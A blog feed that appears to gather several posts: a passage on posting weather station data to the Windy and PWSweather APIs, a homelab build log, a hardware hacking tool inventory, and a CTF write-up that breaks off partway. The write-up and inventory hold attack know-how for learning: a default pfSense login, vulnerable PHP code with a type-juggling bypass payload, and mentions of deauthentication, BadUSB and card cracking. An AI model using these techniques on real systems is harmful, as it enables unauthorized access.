[332730][V][WeatherSensorDecoders.cpp:67] findSlot(): find_slot(): ID=00006241
[332737][D][WeatherSensorDecoders.cpp:105] findSlot(): sensor[0]: v=0 id=0x00006241 t=13 c=0
[332745][V][WeatherSensorDecoders.cpp:130] findSlot(): find_slot(): Storing into slot #0

Making the Station Data Accessible

With correct data being collected from the station now it was the time to make the data public. The first option that came to mind was OpenWeatherMap which was, without a doubt, the best (and the only mentally sane) API that I’ve found to register the station and post data. The problem was that OpenWeatherMap provides nothing other than an API to access the data, nor you can access the data specific for your weather station via any out of the box application.

So looking for other options started. The most common one is Weather Underground, but they are ongoing some controversy due to changes on the pricing to access their APIs (although it seems not to impact access to your own station data). Anyway, another alternative that came to mind is my favorite (by far) weather application, (Windy)[https://www.windy.com/]. I didn’t even know if they supported Personal Weather Stations (PWS, yes, that’s a thing), but I quickly found out they rolled out support for PWS’s recently².

Ok, so now let’s try to stream out some readings. I was expecting half-decent documented API and a simple POST would do the trick (like in OpenWeatherMap). But reality is… weird.

So first off, depending on the platform, you need to either do a request to register your station (e.g., OpenWeatherMap) or you need to fill out some form to register your station (Windy and PWSweather). Either way you end up obtaining the API key to be used with that specific station, which makes sense.

Then documentation gets harder and harder to find. I believe this is mostly caused by most PWS stations that are WiFi connected out of the box support sending data to several services, with not being so common having integrations done from scratch like this one adventure.

So, focusing on the not so bad one, Windy has some documentation… on a forum post from 2019 lost in their forums, but it’s complete information — better than most. So you basically have a JSON object, which can contain both updates to the station information as well as weather observations. Taking from their own example, you can POST to https://stations.windy.com/pws/update/<API-KEY>:

{
 "stations":[
  {"station":0, "name":"My Home Station", "lat":48.2, "lon":28.6, "elevation":80, "tempheight":2, "windheight":10},
  {"station":1, "name":"My Other Station", "lat":47.1, "lon":31.2, "elevation":122, "tempheight":2, "windheight":8}
 ],
 "observations":[
  {"station":0, "dateutc":"2019-03-15T06:15:34", "temp":1.2, "wind":2.8, "winddir":189, "gust":3.7, "rh":76},
  {"station":1, "dateutc":"2019-03-15T06:15:34", "temp":2.6, "wind":1.1, "winddir":135, "gust":2.5, "rh":65}
 ]
}

You can even update several stations at the same time. Once again, not bad at all, however it would be nice to have some official documentation on a dedicated page. The problem was that after a few requests, I started to have 401 errors. I did later find out that you can only send a request each 5 minutes (their documentation mentions that So, it’s not necessary send us data every minute, 5 minutes will be fine., but that goes a long way to be a hard limit). But with some caching of the values and sending them in the array as observations, everything worked out.

However, when trying to streaming data to PWSweather things got weirder and weirder. First off, there is not documentation at all, with the references to custom data upload pointing to open support tickets. After looking across old forums and reddit posts I found out that they use the same API as wunderground. And some random user on one of the random forums tested a lot of endpoints and found out that several? endpoints worked to send data:

pwsweather.com /pwsupdate/pwsupdate.php?
pwsweather.com /weatherstation/updateweatherstation.php?

but… why the query parameter to send data? wut? (at this point I was expecting that it was some kind of typo). Let’s look into the Weather Underground API now that we have endpoints to test against. So I quickly found a StackOverflow post that make it as clear as possible:

To upload data, send a GET request to https://weatherstation.wunderground.com/weatherstation/updateweatherstation.php

A full example: /updateweatherstation.php?ID=KCASANFR5&PASSWORD=XXXXXX &dateutc=2000-01-01+10%3A32%3A35&winddir=230&windspeedmph=12&windgustmph=12&tempf=70&rainin=0&baromin=29.1&dewptf=68.2&humidity=90&weather=&clouds=&softwaretype=vws%20versionxx&action=updateraw

The minimum required query parameters are:
ID: the station id
PASSWORD: the station key
dateutc: the time in format YYYY-MM-DD HH:MM:SS, or "now"

I don’t even know what to say. But summarizing the problems:

Using a GET and query parameters to send data
Only supports US units of measurement and not supporting metric
Only supports specific units for certain measurements that are not the most common ones (e.g. barometric pressure is commonly measured in milibar/hPa, but somehow the API accepts inches Hg³)
There is no validation on top of the values sent as part of the payload beyond their type, so completely random values will be considered valid (Windy validates the values to be within plausible sensor readings)

But this seems somehow a standard across several weather services, which The Weather Company⁴ defines as the PWS Upload Protocol.

Anyhow, using this hell-raised API I was finally able to post data to the PWS weather website. There is also a “trust” rating to the station (that goes from “initializing” to “active”), but it seems to only consider the readings posting rate and nothing more.

How It Looks Like

So, after all the struggling, from the wrong weather station model to mess around with nonsense APIs, I was able to have a nice running solution.

The receptor unit based on the TTGO with the decoder up and running and streaming data to both PWS Weather and Windy, using the small screen to showcase some real time data and the last HTTP request status code can be seen bellow.

The following screenshot is from the Windy website, which you can visit here.

And on PWS Weather we can see data with more detail.

Footnotes

The WetBulb Globe Temperature (WBGT) is a measure of the heat stress in direct sunlight, which takes into account: temperature, humidity, wind speed, sun angle and cloud cover (solar radiation). weather.gov ↩
Windy on its free tier only allows you to check the data for the last week, but that’s fine because we will also stream the data to PWS Weather platform by Vaisala Xweather which keeps historical data with pretty charts and exports (and uses the exact same API as Windy). ↩
1 inHg = 33.86389 hPa ↩
The Weather Company owns both weather.com and Weather Underground. ↩

From a NAS to a full-fledge homelab with spare parts

Thu, 05 Sep 2024 00:00:00 +0000

It all started with a QNAP NAS to backup my raw photography’s and have some way to store other media files. Then some smart home devices randomly appeared. And then some enhancements needed to be done to a proper way to stream audio and video to my LG ~~dumb~~ smart TV. Then an UPS to safekeep the system operation. And from simple things with simple goals, piece by piece, we end up with a complex soup of things that somehow work. This details what I call my current homelab, and gives the main ideas on how you can build one yourself… if you really want to.

Ground Zero: The NAS Quest

So, complex things start with the simplest of the objectives, in the case, storing and backup my always growing storage of both RAW and processed photographs from my other hobby. After some evaluation of the available alternatives I ended up with a QNAP TS-328 3-bay NAS with 2Gb of RAM with RAID 5 support. Loaded it up with 3 4Tb 3.5 HDDs and we are up and running with 8Tb usable storage.

Of course the minimalist purpose of storing photographs was only the start. Soon after I started dumping my media library into it and streaming it to my devices via the old DLNA. And struggling with the bad performance of the transcoding of the ARM Cortex-A53 4-core 1.4 GHz processor (even if it says that supports up to 1080p) — the secret lies in stating “up to” and not fully support it.

Other things were fun to play with, like the third-party library of apps available and the ability of running containers!

Also, for remote access, while in the past I used to setup a OpenVPN server, open router ports and so on, that’s the old way of doing things. Nowadays I always use Tailscale as it makes everything more secure (Wireguard without needing to open ports on the router, what else can you ask for?) and easy (giving access to other users is as simple as sending an invite via the Tailscale portal). Ah, and it also has really well done applications for all operating systems, including an app for QNAP (I know, I’ve become a little of Tailscale fanboy myself).

The Plex Episode

So there is this thing called Plex, or more concretely Plex Media Server, that you can setup basically anywhere (containers, you know the drill). So the idea is, maybe, I could set up some Raspberry Pi with this Plex thingy, mount my QNAP storage and just index the media that I have. This would come with the plus of proper indexing and navigation with covers, nicer UI than what’s bundled up with TVs for DLNA streams, and so on.

So I fetched my unused Raspberry Pi 4 with 8Gb of RAM from the shelf, set it up with a Argon ONE M.2 case with SATA SSD extension. I set it up with an 20€ 256Gb SSD Verbatim Vi560 and it worked perfectly… for a total of 3 months — Verbatim, I will never trust your products again.

But, before the SSD disk fail story, the system was up and running. Mounted the QNAP folder with fstab (just adding a line to /etc/fstab):

//<qnap_address>/Public /mnt/qnap cifs username=<user>,password=<password>,x-systemd.automount 0 0

For running Plex on Docker the easiest way is to use the well-crafted images provided by LinuxServer.io.

---
services:
  plex:
    image: lscr.io/linuxserver/plex:latest
    container_name: plex
    ports:
      - 32400:32400
      - 1900:1900/udp
      - 5353:5353/udp
      - 8324:8324
      - 32410:32410/udp
      - 32412:32412/udp
      - 32413:32413/udp
      - 32414:32414/udp
      - 32469:32469
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=Etc/UTC
      - VERSION=docker
      - PLEX_CLAIM= #optional
    volumes:
      - /plex/data:/config
      - /mnt/qnap/tvseries:/tv
      - /mnt/qnap/movies:/movies
    restart: unless-stopped

This allows you to access plex directly via the browser. However, if you want to install Plex on your TV, phone, and so on you need a Plex account, with it you can obtain the Plex claim token to basically associate your local library to your account. Which, at the end of the day, forces you to have a Plex account just to access your own stuff… not cool, but something I could live with, at least for a while.

It’s not DNS. There is a no way it’s DNS. It was DNS.

So, with QNAP and Plex running, why not rollout your own DNS service? In the past I have used both Pi-hole and AdGuardHome with different levels of success. My first idea was to run it directly on the Router, as I have a TP-Link Archer C7 AC1750 which is full-fledge compatible with OpenWrt. OpenWrt has a really good guide on how to run AdGuard on it, however the flash storage was not enough for it. Fear not, we can extend the RootFS with a USB storage device. And everything worked great! The problem was the stability of the service, as the router started to misbehave after a few weeks of uptime, requiring recurrent reboots to keep everything working — not great, but not too terrible.

While I was at it, also better configure this Raspberry Pi as part of my Tailscale tailnet. But not as just another node, but an exit node, giving me something closer to a typical VPN, in a way that I can access all of my home network devices.

However, after some episodes of issues with DNS resolution, I went with the more stable version of running it on the Raspberry Pi, alongside with Plex. This solution kinda of works, but if for some reason the Pi failed (looking at you again, Verbatim), this became a single point of failure (as the announcements of DNS servers available on the networks were not really working properly and fallback to external DNS resolvers as expected when the main one had failed).

Meanwhile I decided to invest in a more recent router, with support for Wi-Fi 6, and the choice was a Asus TUF Gaming AX4200 as it is fully compatible with OpenWrt and has 256Mb of flash and 512Mb of RAM which would be more than enough to run AdGuard. But for now, I will keep with the stock firmware as it is performing well and stable and will resort to the default Adguard public DNS servers to block most of the things without the complexity of running my own DNS service.

The Home Automation Adventure

Nowadays having some surveillance cameras is common practice, in my case I opted for a few (3x) IP66 rated TP-Link TC65 3MP Wi-Fi cameras with Night Vision for outdoor use. They work perfectly well out-of-the box via the Tapo app even under bad weather, and allow local access via a configurable RTSP stream. Given that, I decided to extend the range of products and brought two more cheap indoor cameras (Tapo C200), and a few (4x) Tapo P110 Plugs with built-in energy monitoring. All of it a joy to use.

But over the years I had accumulated a lot of Smart Devices with the most diverse protocol landscape, including some cheap Xiaomi Mi Humidity and Temperature sensors with BLE that I use to monitor my house comfort (as I wrote previously here). And while I could spend more money and buy the proprietary sub-GHz sh!t that Tapo created to home sensors, I finally decided to give a second chance to Home Assistant. I say second change as the first time that I went by that road I totally regretted it, as it was a mess of software, without proper backup strategies, fragmentation of components within the UI, and so on.

But this was a side-quest, and let’s get back to the main story, as the endeavors of trying out Home Assistant were, let’s say, delayed.

The Verbatim Disk Fail

After three months of smooth operation, I started to have misbehavior’s. Plex not responding, Raspberry Pi not responding, etc. My first option on the table was some kind of issue with the Argon case, as it needed to provide enough energy to the SSD to be able to operate, and this was a known issue in the first revisions of the Argon case. A lot of hours were lost, a lot of tearing it apart and rebuild it again, lot’s of SSD formats, and the story goes on. The Raspberry Pi simply didn’t boot in the most of the occasions, going straight to the BIOS screen that would claim ‘no bootable disk found’. And this was true, because as soon I flashed a USB drive with a random Linux distro, the Pi booted correctly.

Eventually, after a lot of trial and error, the SSD simply and consistently died. And it was the culprit from the beginning. Oh well, disks fail, maybe not so fast…

From Scratch

So, disk fail. Let’s re-do everything from scratch, with some lessons learnt. First off, I scavenged a old WD 256Gb SSD from a no longer used laptop (project for another day) and formatted it with the same Raspberry Pi OS Lite (basically the bloatware-less version of the Raspberry Pi OS). After that setting up the essentials, including Docker. But managing Docker-compose stacks by hand it is just… boring. Thus I decided to go full-fledge to Portainer. It gives you a nice UI for managing all your container stacks, and a kind of library to find software, so called “App Templates”. Which makes things easy to deploy new software.

Given that it was a matter of setting up some core software:

Jellyfin, finally a nice alternative to Plex, without the bloat and mandatory accounts garbage;
Heimdall, a minimalist application dashboard working as a landing page to the Raspberry Pi (but I’m looking at you Homepage, as you seem a promising alternative);
Transmission as a service to download random stuff directly to the NAS, yarr!;
Grafana, cAdvisor, Prometheus, and Prometheus node exporter working as a nice monitoring stack, specially to control the temperatures as the Argon case is not the best thing in terms of heat dissipation. Grafana was loaded up with the nice “Raspberry Pi & Docker Monitoring dashboard template by Oijkn

Talking about heat dissipation, Argon case comes with a piece of proprietary software that you can easy install to control a little fan that comes in the case. However, the software is not the best thing around, but there is a cool reimplementation that works top notch that allows you to configure the fan via I2C and control de case added on/off button.

And we are up and running!

Smart Home Pt. II

Now, getting back to the Home Assistant story. I took up one Raspberry Pi 3B that I had around (the minimal recommended to run Home Assistant, like why on Earth you need so many resources Home Assistant?!) and just flashed the out of the box image of Home Assistant on an industrial grade 8Gb SD card from Sandisk — let’s see how long it last, compared to regular SD cards.

After setting it up, surprisingly easy to do, I could add my Sonoff Zigbee dongle and it was automatically discovered and setup. Now I just needed some devices to “discover”. And while I had those cheap Xiaomi Humidity and Temperature BLE sensors laying around, I remembered that recently I found out that those things could be converted to Zigbee, so challenge unlocked… or not so much of a challenge, just go here and follow the steps (make sure that your devices are LYWSD03MMC or otherwise you will not be able to do this). And simple as that we have our Zigbee sensors up and running.

Next step was to integrate with the Tapo devices, both cameras and plugs. While the plugs were plug and play (pun intended), the cameras not so much, and forced me to delve into the jungle of HACS that I totally would recommend to stay away of if you can as this HACS sometimes work in fun ways… but after finding the right HACS, it was ready to go, cameras integrated.

Last thing remaining was my hacked Ikea Vindriktning Air Quality Sensor, to which I added an Wemos D1 for streaming PM2.5 readings over the air, plus a BME280 to add humidity, temperature and pressure monitoring to the unit. Here the easiest way to go was to just use ESPhome instead of custom code, as it integrates really well with Home Assistant.

uart:
  rx_pin: D2
  baud_rate: 9600

sensor:
  - platform: pm1006
    pm_2_5:
      name: "Particulate Matter 2.5µm Concentration"

  - platform: bme280_spi
    temperature:
      name: "BME280 Temperature"
    pressure:
      name: "BME280 Pressure"
    humidity:
      name: "BME280 Humidity"
    cs_pin: D5

switch:
  - platform: restart
    name: "Device Restart"

I will not delve into the IKEA Vindriktning hardware hack itself as there are plenty of tutorials out there on how to do it. Just want to point that this is, by far, one of the easiest things to hack out there, with easily accessible power and data lines, and plenty of space for additional hardware inside of the “box” (however, the heat of the components shifts a bit the ambient temperature read by the BME sensor).

Of course, I also added the Home Assistant Raspberry Pi to my tailnet as a node, as it makes it easier to share access to it.

The Finale (Current Setup)

At last, the grande finale¹. As stated in the beginning, simple things with simple purposes end up being complex if you give to them enough time. I brought the NAS more than 4 years ago now, and it made part of a lot of different setups, being the only piece that still stands the test of time in this big ball of mud. If you are here, maybe you are considering building your own thing, either an homelab or a smart home setup. The only piece of advice that I have for you is to try to keep the mess to a minimum, other that that, just don’t trust it in life or death situations (that’s why my smoke sensors work purely offline).

Footnotes

All of this system parts is backed up by an Cyberpower UPS BR700ELCD 700VA 420W 8 Sockets with Surge and Spike Protection, and recommend that you should do the same, specially if you have an NAS. Connecting the UPS USB connection to the NAS automatically sets up the NAS to enter in safe mode if the UPS kicks in, which is a nice thing to have. Also, having network connection even when the neighborhood lights go out is nice. ↩

Hardware Hacking and Research Toolbox Inventory

Sun, 05 May 2024 00:00:00 +0000

Inspired by the blogpost My Red Team assessment hardware by David Sopas this post describes hardware tools that I have in my inventory, their purpose as well as the features/firmwares/tricks that motivated me to buy them. This is not intended to be an exhaustively detailed list, but I will try to give some rational and use-cases for each of the tools, as well as categorize them.

Do it yourself projects (partially or completely) will be marked as such with the tag [DIY]. URLs provided are either to the repositories, official websites, technical references, or online sellers. If you find any URL broken please contact me, otherwise you can still find the tools by searching the name of them with any search engine.

None of the links to online stores are sponsored in any way and should only be used as a reference.

Wi-Fi, Bluetooth and other radios

[DIY] Wardriver.uk by Joseph Hewitt

For wardriving¹ purposes (2.4Ghz WiFi networks and Bluetooth devices) I have built a wardriver.uk based on the very detailed and nicely explained project by Joseph Hewitt, which outputs Wigle compatible files. You will need two ESP32 modules (ESP32-DevKitC V4 with ESP32-WROOM-32U is recommended), a GPS module, a SIM800L GSM module, an i2c LCD, a DS18B20 temperature sensor, and an SPI micro SD card reader/writer. I did wire it with some protoboards in the first version, then I ordered the PCB designed by the author. You can order the PCBs from the author if you want to support the project.
[DIY] io433 by kripthor

IO433 is a ESP32 (TTGO T-Display) & CC1101 based 433Mhz sniffer and re-player for ASK-OOK signals. Building instructions are available in the repository of the project as well as the firmware and gerber files for the PCBs (although I built one on top of a generic protoboard). It is a nice tool for playing around with 433Mhz based devices such as cheap weather monitors, door rings, and the like.
Zsun wifi card reader

Zsun is an Atheros AR9331 based wireless card reader with 64 MiB RAM and 16 MiB SPI flash. The specs are enough to run OpenWrt, which can make the device a tinny wireless AP / client / repeater.
GL-MT300N-V2 Mini Smart Router

A small and cheap travel router that runs OpenWRT (128MB RAM, 16MB Flash ROM), with two RJ45 Ethernet ports, (micro)USB charging with UART and some GPIOs available. It also has a nice physical VPN switch button and a easily clickable reset button (ideal to start over when you fail to configure OpenWrt properly).
[DIY] Throwing Star LAN Tap

Throwing Star LAN Tap is a passive Ethernet tap (read-only access via J3 and J4 ports), able to monitor 10BASET and 100BASETX networks. You cna build one by printing the PCBs and soldering some capacitors and RJ45 ports (instructions available). Otherwise you can also buy it in a ready to use package.
TP-Link TL-WN722N V2.0

The good’old and cheap 2.4Ghz Wi-Fi dongle that allows you to enable monitor mode² to do Wi-Fi mischief. Normally it is recommended to get the V1 version because it works out of the box (Atheros AR9271) but you can also make it work in other hardware revisions.
RTL8812au-based dual-band AC1200 WiFi adapter

A RTL8812au-based dual-channel Wi-Fi adapter similar to Alfa Networks AWUS036ACH (as in uses the same chipset). This chipset allows monitor mode² in both channels, thus ideal to use in offensive Wi-Fi adventures.
Nooelec NESDR SMArTee v2

A cheap and reliable SDR with RTL2832U Demodulator/USB interface IC and a R820T2 tuner IC. I advise to buy a bundler with some antennas which allows you to do some nice experiments out of the box.

Device inspection (debug tools and programmers)

FT232 USB for TTL Serial Adapter for 3.3V and 5V

FT232 USB UART Board is the go-to solution for USB-to-UART serial conversions. Different models have similar features. I carry two, one older model with miniUSB connection and another with USB A connection, and always together with a bunch of jumpers.
USBASP 2.0 based on ATmega8A

USBasp is a USB in-circuit programmer for Atmel AVR controllers which are commonly used in smart devices and other controllers. Firmware is provided by Thomas Fischl which has other cool projects.
Dongle ST-LINK V2 STM8 STM32

A ST-Link-Compatible Programmer & Emulator / Debugging dongle supporting both STM8 and STM32 bit processors series, that, similar to Arduino, are widely used in smart appliances.
YS-IRTM 5V NEC Infrared UART transceiver

It consists of a dual 38KHz 940nm infrared (IR) TX/RX LEDs and a micro controller which provides a UART interface. Can not be used directly via USB, thus it is recommended to connect it via a generic micro-controller. You can use the following as a reference.
ELM327 V1.5 OBD2 Bluetooth Scanner and Diagnostic Tool

A generic OBD-II protocol reader that works with a lot of car models and brands. Mostly unused in my case as I did not delve into car hacking, but I do recommend a workshop for beginners like me just to understand the “world”: Remoticon 2020 // Learn How to Hack a Car Workshop
CH341A USB Programmer with Adapters

The CH341A USB Programmer supports most of the 24/25 series SOP8 chips (commonly used for BIOS), and can be used to back up, erase and program such chips. I have successfully used it in the past to recover laptops from corrupted BIOS issues. I also 3D printed a yellow case for it.
USB Logic Analyzer 24MHz 8 Channels

A generic low-budget logical analyzer that features 8 Channels and, theoretically, can go up to 24 MHz (but not really in practice). It is good enough for most low-baudrate analysis, but can struggler with higher baudrate (that are becoming common). Nonetheless a good tool to keep around, specially if you don’t want to invest into a Saleae. Also, it is compatible with Saleae Logic 2 software, and, theoretically, with sigrok but I didn’t manage to put my version working correctly with it.
[DIY] Logic probe

A simple and quick to use probe that you can build (several kits available) that can be useful to probe circuits when you do not have a multimeter/logic analyzer at hand. You just connect it to a REF voltage source and GND, and then the 3 LEDs will tell the rest, if you have a Red Only it is a Logic 0, a Yellow Only is Floating, a Green Only is a Logic 1 and All LEDs means an oscillating signal.
UNI-T UT139C Multimeter

A good multimeter is always a good investment (but, still, you don’t need to go to the most expensive ones). Some of the most useful features beyond the trivial ones, from my perspective, are the frequency and temperature (℃/℉) readings.

Smart cards

SIM card converter to Smartcard IC

A SIM card to Smartcard IC converter and extension, supporting standard, micro and nano SIM cards.
PN532 NFC RFID IC Card Reader Module 13.56MHz with USB Port

A libNFC compatible board that can be used to read/write to NFC cards, including Mifare classic cards. You can also keep some empty (UID-writable) cards around. There is a good blogpost by Christian Mehlmauer on how to use the libNFC to crack Mifare classic cards, and How to hack Mifare Classic NFC cards by lp1.
Generic Magstripe Reader

A cheap and generic magnetic stripe reader that can be used for research and cool projects such as magspoof.

Generic boards

Raspberry Pi Zero W with USB A add-on

A Raspberry Pi Zero W is a full computer on a stick, capable of running several Linux distros (no more intro needed). The USB A addon board allows it to be plugged to any USB port, and, more than that, to act as a U disk or even as a BadUSB³ with P4wnP1 A.L.O.A.. P4wnP1 A.L.O.A. allows the Pi to have Plug&Play USB device emulation, HIDScript and Bluetooth and WiFi offensive analysis. Other use-cases include the known Pwnagotchi for cracking Wi-Fis either through passive sniffing or by performing deauthentication and association attacks.
nRF52840 Dongle

nRF52840 Dongle is a small USB dongle that supports Bluetooth 5.4, Bluetooth mesh, Thread, Zigbee, 802.15.4, ANT and 2.4 GHz proprietary protocols. It is useful to probe into this protocols, being known for the ability to easily eavesdrop Bluetooth Low Energy communications and perform multiple active attacks based on InjectaBLE strategy. It can also work as a security key using Google OpenSK.
M5Stack Core

An ESP32-based (Bluetooth + Wi-Fi) developer board in a really nice packaging, with built-in battery, 3 physical buttons and 20*240 IPS screen. One cool use-case is the ESP32 WiFi Hash Monster which can be used to capture all the EAPOL / PMKID packets on a SD Card for further analysis. Other use-case is the MarauderCentauri for WiFi/Bluetooth offensive and defensive tools; you can also buy the full-fledge custom hardware at justcallmekoko store.
DigiSpark Attiny85

A tiny tiny microcontroller with an USB A port that can be used as a BadUSB³. It is so cheap that it is good for plug it and leave situations. A good tutorial for it done by Baud on 0x00sec.
Micro:bit

With 3 units you can sniff on all Bluetooth LE advertising channel, and with BtleJack you can sniff, jam and hijack connections.
Wemos D1 mini / ESP8266, Raspberry Pi Pico, Arduino Nano

Some of the boards that I typically carry around, some with Pin Headers soldered, others not.

Screwdrivers, Lockpick and others

Mi x Wiha Precision Screwdriver (manual)

A generic precision screwdriver kit supporting most models of screw heads. Compact in size which is ideal for carry in a backpack.
4-Way Multi-Functional Utilities Key
Generic Lockpick set with Practice locks
Multi-tool

A multi-tool is always nice to have, and while I don’t recommend any in specific (any Leatherman or Gerber should be more than enough), any that you buy should have, at least: (1) pliers, (2) a sharp-enough cutting blade / knife, (3) some large bit driver, and (4) a bottle opener!

Random

1Life usb:hub 3 with RTL8153 Gigabit Ethernet Adapter

A generic USB extension hub with a Gigabit Ethernet Adapter (based on the RTL8153) is a must have for when you have few USB ports or no RJ45 port. It is also useful if you want to connect to more than one physical network at the same time.
Rii Wireless Mini X1 with Touchpad - 2.4GHz - QWERTY

An all-around wireless keyboard which is useful for a range of scenarios, e.g., configuring Raspberry Pi’s.
[DIY] Small IC Test Clips, Pogo pin clamps and PCB Workstation with Needle-Probes

Useful when probing PCBs and connecting to debug ports / test points. I totally recommend the 3D printed PCB workstation as it works for most PCBs and smallish traces and connections.
Generic USB Multimeter

Useful to troubleshoot USB connections (voltage and amperage). More recent models (e.g., UM25C) also allow monitoring via Bluetooth connection.
Large assortment of cables and adapters

There is no such thing as too many cables, as there is no such thing as too many adapters. A few that I recommend to have always around:
- USB: A->C, C->A, C<->C, A->micro, A->nano, USB OTG, A<->Lightning
- Video: HDMI<->HDMI, HDMI<->mini HDMI, VGA<->HDMI
- RJ45
- Assortment of jumpers (male->female, male<->male, female<->female)
- MicroSD to SD adapter and SD card reader
Generic USB LED lamp (useful for low-light situation)
Assortment of USB Pens

This keeps to be one of the things that I use the most (from live boots to install new OSes). You do not need to go to the fancy ones with USB-C and such if you keep some adapters at hand. Ventoy is a nice tool to have several ISOs in the same drive and boot from them when needed. I also keep some Linux live USBs (with something such as Debian Stable), and Clonezilla.
Powerbank (at least 10000mAh)
Laptop

I left this to the end on purpose. Most probably you are thinking on a high-performance laptop. While that would be nice, for most of the cases one cheap, second hand, Thinkpad (or any other reliable brand) will suffice. I now have a Thinkpad Y370 (~250e) and a Thinkpad X240 (~200e), and the only thing that will bother you the most is RAM if you have less than 8Gb of it. Other than that just use the cloud. Google Python Notebooks are nice, but there are several cheap VPS machines that you can rent or use freely if needed (riding on free credits).
Backpack and bags

All this stuff needs to be carried (hopefully not everything at once). For that I recommend any rucksack-like backpack such as this one. I would not recommend the military-grade ones, specially if you don’t want unnecessary attention (e.g., airports). Also, some small bags with compartments are useful, such as this one or this one. And, always carry some velcro roll (that you can cut to size) which is always useful to tie things together.

Footnotes

Wardriving is the act of searching for Wi-Fi wireless networks as well as cell towers, usually from a moving vehicle, using a laptop or smartphone., Wikipedia ↩
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first., Wikipedia ↩ ↩²
USB device has an in-built firmware feature that allows itself to be disguised as a human interface device (USB HID), such as a keyboard, and thus inject payloads via keystrokes. ↩ ↩²

OPOSEC XMAS CTF Challenge Christmas 2022 Write-up

Tue, 11 Apr 2023 00:00:00 +0000

Well, I guess it is better late than never, so almost four months after the closing of the OPOSEC XMAS CTF Challenge Christmas 2022 this is my write-up on how I did manage to solve all the challenges and finish in the 4^th place.

There was a total of 13 challenges ranging from trivia to network categories.

Trivia (2)
Crypto (2)
Web (2)
Misc (4)
Network (3)

Trivia

Who? (100 pts)

So, for the first challenge we got ourselves a little trivia, with a well-known meme as the challenge content. For those of us that are here for some time the connection of this meme with the infosec community is clear, some years ago (mid-2011) a hacker group raised to fame due to some high profile attacks, including Sony Pictures’ internal database, CIA website and FBI’s contractor InfraGard among others. This hacker group is LulzSec and their logo was based upon the Feel Like a Sir meme.

Flag: LulzSec

The Great Hack (200 pts)

How about ensuring that you are a guaranteed winner of a radio contest by controlling all the telephone lines? Imagine, what a classy hack that would be. It took place in real world and the hacker won a costliest prize. What was the costliest prize that the hacker won?

So we got ourselves a little riddle. Phreakers, people who specialize in attacks on the telephone system were mostly popular in the mid-1980s. After some googling we find several articles describing such attacks and well-known personalities that carried them. One of them is Kevin Poulsen (Dark Dante):

On June 1, 1990, Poulsen took over all of the telephone lines for Los Angeles radio station KIIS-FM, guaranteeing that he would be the 102nd caller and win the prize of a Porsche 944 S2.

Flag: Porsche 944 S2

Crypto

Mmmm… Donuts… (100 pts)

Donuts are the best breakfast food! There is a donut flavor for everyone’s taste, they pair great with coffee, and they can be eaten on the go! The key to solve this challenge is the most important meal of the day. If one donut doesn’t help, try having another. You better solve it fast before you get diabetes.

PS: My favorite donut is the original, just glazed.

So, I spent a tremendous amount of time deciphering this one. After some trial and error, experimenting with every rare encryption system… It becomes more or less clear that we have to go back to the basics. The text suggests a lot around breakfast, and one thing missing is Bacon, so there may be a Baconian cipher somewhere… Taking a look at the example given on the Wikipedia page, it became clear:

So, after converting the original message, we have the following:

AABABBAAAABABABABABBABBABABAAABAAAAAAAAAAABBAABABAAAABBABAAA

And then decoding with the standard Bacon Cipher, we got FRXMOIUAGLDI. So this is not over yet! Another common cipher in CTF challenges is the Vigenère cipher that uses a key to decipher. By the text we could bruteforce each one of the nouns in order to break it, or simple use the one in spotlight, breakfast. Using that as the key, we got ourselves the flag. You can check out the CyberChef recipe here.

Flag: EATMEDRINKME

Encoding is the process of converting data from one format into another, typically for the purposes of efficient transmission or storage. There are many different types of encoding schemes that can be used, depending on the specific requirements of the data and the intended use. Encoding is an important aspect of data management and is used in a variety of applications, including networking, data storage, and multimedia.

And we got a text file with the following content:

JTI2JTIzOTAlM0IlMjYlMjMxMDklM0IlMjYlMjMxMjAlM0IlMjYlMjMxMDQlM0IlMjYlMjM5MCUzQiUyNiUyMzUxJTNCJTI2JTIzMTE2JTNCJTI2JTIzMTA1JTNCJTI2JTIzNzclM0IlMjYlMjM3MSUzQiUyNiUyMzExOSUzQiUyNiUyMzExOSUzQiUyNiUyMzg4JTNCJTI2JTIzNTElM0IlMjYlMjM3MyUzQiUyNiUyMzEyMiUzQiUyNiUyMzc3JTNCJTI2JTIzODYlM0IlMjYlMjM1NyUzQiUyNiUyMzcxJTNCJTI2JTIzODYlM0IlMjYlMjM3MCUzQiUyNiUyMzEwMCUzQiUyNiUyMzU3JTNC

So this must be just random encoding on top of random encoding. Let’s go to CyberChef once more, and do: (1) from base64, (2) URL decode, (3) from HTML entity, and lastly (4) from base64.

Flag: flag{b0l0_r31_FTW}

Web

The Folt (100 pts)

pfSense is a free and open-source firewall and router software distribution based on the FreeBSD operating system. It is designed to provide a flexible and powerful platform for building and managing network infrastructure, and it includes a wide range of features and capabilities that are suitable for use in both small and large networks.

Have a try http://machine.example.com/

So we got ourselves a default pfSense landing page. First things first, let’s try default credentials, which are admin and pfsense. Trying those we got ourselves the quickest flag.

Flag: flag{Default?_More_Like_Badfault}

In Passwords, We Trust, and in PHP, We Believe! (200 pts)

Great, another admin panel, do you think you can crack it?

And we got ourselves a little PHP:

<php
  $user = $_POST["username"];
  $input = $_POST["password"];
  $answer = json_decode($input);

  //Random 16 chr token
  $token = base64_encode(bin2hex(random_bytes(16)));

  $password = $answer->password;

  if(($password == $token) and $user == "admin") {
	  //Super Flag!
  } elseif(empty($user) && empty($password)) {
  	  echo "<h2>Login</h2>";
  } elseif(empty($password)) {
  	echo "<h2>Error Encountered! Wrong Token!<br></h2>";
  	echo "<script>console.log(\"Your token was: $token\")</script>";
  } 
?>  

And the page generates a cookie-based token similar to this one: NTUwMGIxMDdmMDMzMTYwYzZjZTEwMmMwOTU5NzVjOGI= that gives nothing useful when base64 decoded.

So let’s look into the source ! We can see that there is a loose comparison $password == $token which means that we are most probably looking at a Type Juggling vulnerability, i.e., During the comparison of variables of different types, PHP will first convert them to a common, comparable type.

However, the most strange thing is that you cannot simply pass a string to the password field, but instead a valid JSON with a password key, $password = $answer->password;. But why? This was very random indeed.

Nonetheless, after finding out the issue, we could pass the string {"password":0} as the password in the login form, and when the comparison with the $token happens, it will be true given that (0 == “STRING”) -> True (+).

Flag: flag{OnceAgainTypeJuggling}

Misc

Black Hole (100 pts)

